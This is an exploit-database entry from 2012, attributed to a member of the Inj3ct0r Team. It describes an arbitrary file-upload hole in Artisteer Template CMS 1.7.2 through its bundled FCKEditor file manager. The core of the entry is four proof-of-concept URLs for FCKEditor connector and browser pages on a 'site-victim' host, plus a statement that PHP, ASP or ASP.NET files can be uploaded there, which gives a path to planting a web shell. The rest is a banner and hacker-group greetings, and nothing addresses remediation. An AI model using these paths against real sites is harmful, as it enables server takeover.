0day Today Exploits Market and 0day Exploits Database

Template CMS (FCKEditor) File Upload Vulnerability

Author: DoSs-Dz
Risk: Security Risk Medium
0day-ID: 0day-ID-17979
Category: web applications
Date added: 05-04-2012
Platform: php
+---------------------------------------+
|I'm DoSs-Dz Member From Inj3ct0r Team  |
+---------------------------------------+
+----------------------------------------------------------------------------+
# Exploit Title : Artisteer Template CMS (FCKEditor)  File Upload
# Date :  05 April 2012
# Vendor Site : http://www.dotnetcmsportal.com/DownloadHandler.ashx?pg=f8b3f216-6730-4493-9e4c-f8f9b516af69&section=e72d6103-1025-47ac-8fc0-10cc404f52aa&file=172-Art-CMS.rar
# Version : 1.7.2
# Tested On : Windows 7 Professional
# Big Thanks to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Upload Exploit P0C =» 
   
   ------------------------------------------------------------------------------------
   First PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/uploadtest.html    ----> Uploaded File URL: your file link
   You can upload a PHP form, or ASP or ASP.NET
   ------------------------------------------------------------------------------------
   Second PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/connectors/test.html  ----> Uploaded File URL: your file link
   You can upload a PHP form, or ASP or ASP.NET
   ------------------------------------------------------------------------------------
   Third PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/browser.html   ----> see it
   ------------------------------------------------------------------------------------
   Fourth PoC:
   http://site-victim/<PATH>/FCKEditor/editor/filemanager/browser/default/frmupload.html   ----> see it
   -------------------------------------------------------------------------------------- 
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gheurrara on : 05 april 2012     |
+------------------------------------+ 


